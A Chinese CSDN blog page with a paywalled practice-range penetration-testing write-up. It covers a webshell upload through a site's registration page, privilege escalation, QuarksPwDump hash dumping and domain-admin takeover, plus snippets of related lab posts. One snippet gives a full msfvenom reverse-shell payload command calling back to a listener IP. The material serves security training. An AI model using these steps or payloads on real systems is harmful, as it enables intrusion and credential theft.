单机靶场练习(三)(含域)

最新推荐文章于 2024-04-29 03:13:59 发布
原创 最新推荐文章于 2024-04-29 03:13:59 发布 · 772 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#靶场练习

这篇博客详细记录了一次靶场练习的过程,从设置虚拟机环境开始,通过发现并利用V9.6.0网站的会员注册页面漏洞上传大马文件,逐步获取权限。在获取低权限后,通过上传提权文件提升至最高权限,使用QuarksPwDump.exe抓取密码hash,并成功解密。进一步的信息收集和弱口令尝试,使作者连接到另一台主机并发现域账户。最终,通过提权成为域管理员,完成整个渗透测试挑战。

目录

实验靶场练习

需要工具

VMWARE Workstation 15 Player

搭建环境

1.设置虚拟机的网卡为.NAT模式
2.调整物理机网卡vment8ip 为100网段

实验信息

ip地址为192.168.100.100

实验要求

一步一步拿到域管密码

靶场网址

链接:https://pan.baidu.com/s /1_Ve132hubzy8DrBd4oDYCA
提取码:xgfi

实验步骤

1、测试网站可访问性
在这里插入图片描述2、查看版本为V9.6.0,网上查看版本漏洞,发现在会员注册页面可以通过burpsuite抓包上传文件,果断试了试上传大马文件。
在这里插入图片描述3、发现没有回显,自己的环境就登录上看到文件已经上传进去,直接物理机访问。
在这里插入图片描述在这里插入图片描述4、命令查看当前权限,发现权限为低权限,上

最低0.47元/天 解锁文章
kdhoi
关注
单机靶场练习
weixin_45906318的博客
11-21 665
目录实验靶场练习笔记需要工具搭建环境实验信息实验要求靶场网址项目实施5)尝试一下远程桌面连接 实验靶场练习笔记 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机网卡为NAT模式 2.调整物理机网卡vment8ip为100网段 实验信息 ip地址为192.168.100.100 实验要求 在环境中找出3个flag 靶场网址 项目实施 页面 信息收集 ...
单机靶场练习报告
longwsq的博客
11-20 400
目录单机靶场练习报告实验准备使用工具实验结果实验过程信息收集getshell获取哈希值开3389hydra爆破密码 单机靶场练习报告 实验准备 vmware导入两台靶场并开机,靶机下载地址https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1。 使用工具 V...
单机靶场实验
weixin_45906318的博客
11-21 578
目录实验靶场练习笔记需要工具搭建环境实验信息实验要求靶场网址项目实施 实验靶场练习笔记 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机网卡为NAT模式 2.调整物理机网卡vment8ip为100网段 实验信息 ip地址为192.168.100.100 实验要求 在环境中找出3个flag 靶场网址 https://pan.baidu.com/s/1x...
单机靶场练习(二)
kdhoi的博客
11-22 543
目录实验靶场练习需要工具搭建环境实验信息实验要求靶场网址实验步骤 实验靶场练习 需要工具 VMWARE Workstation 15 Player 搭建环境 1.设置虚拟机的网卡为.NAT模式 2.调整物理机网卡vment8ip 为100网段 实验信息 ip地址为192.168.100.131 实验要求 在环境中找出3个flag 靶场网址 网址:https://pan.baidu.com/s/17...
Burp suite靶场SSRF练习(1)-持续更新中
最新发布
09-09
本文档是关于使用Burp Suite进行SSRF靶场练习的指南。 通过靶场练习,学习者可以更直观地理解SSRF攻击的工作原理和影响。以下是对靶场练习的知识点详细解析: 1. 靶场SSRF练习概览: - 练习通过一系列的SSRF挑战...
vulnstack环境靶场(一)
BROTHERYY的博客
11-08 1362
一、环境介绍: 1.拓扑结构 2.环境搭建 这里我多使用了一个win7的虚拟机作为攻击机,使用的vm1网卡。 二、信息搜集 1.敏感信息泄漏 phpinfo默认页面 2.数据库弱口令 3.目录爆破 、漏洞利用 1.利用phpmyadmin日志写入shell 2.利用网站后台getshell 访问该网站以后发现公告信息处有信息泄漏 点击前台模板进入以后点击新建,可以写入一个shell,也可以直接修改当前的模板 不知道目录路径,百度一下yxcms的目录 3.上传cs后门 设置好监听
vulnstack环境靶场
BROTHERYY的博客
12-01 946
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
VulnStack环境靶场渗透()
qq_43590351的博客
09-20 1683
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 成员server2003 192.168.52.141 控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
Vulnstack红日安全内网渗透靶场1实战
热门推荐
道阻且长,行则将至
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
自主搭建的层网络渗透靶场打靶记录
Innocence_0的博客
08-01 1229
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
靶场练习--春秋云境-Brute4Road
NoooEmotion的博客
01-28 2968
Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对环境核心认证机制的理解,以及掌握环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
红日渗透靶场1实战复现
weixin_43410871的博客
06-24 2216
VulnStack 是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场的渗透过程。
【内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
今天是几号的博客
03-30 1567
Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。简单而言,Exchange server可以被用来构架应用于企业、学校的邮件系统。Exchange是收费邮箱,但是国内微软并不直接出售Exchange邮箱,而是将Exchange、Lync、Sharepoint款产品包装成Office365出售。实验靶场环境:0day.org环境Win7 x64 0day.org PC-Jack 访问主机地址。
内网靶场_从自做到拿下-自做篇
l805142479的博客
03-14 6374
内网靶场学习,从自己制作靶场到拿下靶场;从frp的隧道搭建,到cs利用frp的反向上线;
【XSS漏洞-02】XSS靶场介绍(BlueLotus_XSSReceiver、DVWA、XSS-labs等)
m0_64378913的博客
05-13 2720
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主。 DVWA:一个功能较全的靶场环境,漏洞类型齐全,包在XSS种类型的漏洞,各有4个级别的破解难度。 BlueLotus_XSSReceiver:该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大。 2 DVWA靶场搭建过程 方法一:可以参考《Docker上搭建DVWA漏洞环境》。安装简单,但安装结果功能有所欠缺。 方法二:可以参考《WAMP环境+DVWA漏洞测试平台搭建过程》。
内网渗透总结——红日靶场①_红日靶机账号密码
2401_84301227的博客
04-29 420
外网:192.168.43.17内网:192.168.52.143可以Ping通外网通192.168.52.138(win2008)通192.168.52.141(win2003)小皮必须是自带的,下载的新版本会导致kali机连接目标失败问题原理:自行理解内网两台不出网win互通win7开启phpstudywin11访问80端口得到phpstudy探针#发现开启了80,3306端口#访问发现80端口是php探针。
红日-VulnStack靶场-ATT&CK(二)
braty_的博客
10-01 1556
红日二,cs横向移动
VulnStack靶场6
weixin_45568454的博客
11-04 1607
打靶日记之VulnStack记录 记下了好多踩过的坑 以及一些小的心得体会
XSS漏洞靶场练习 - 从入门到实践
本篇文章将围绕“xsser.7z漏洞练习靶场”这一主题,详细解读XSS漏洞的相关知识,包括它的基本概念、类型、攻击方法以及防御策略,并且会对提供的“xsser”压缩包进行说明。 ### XSS漏洞的基本概念 XSS,全称Cross-...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值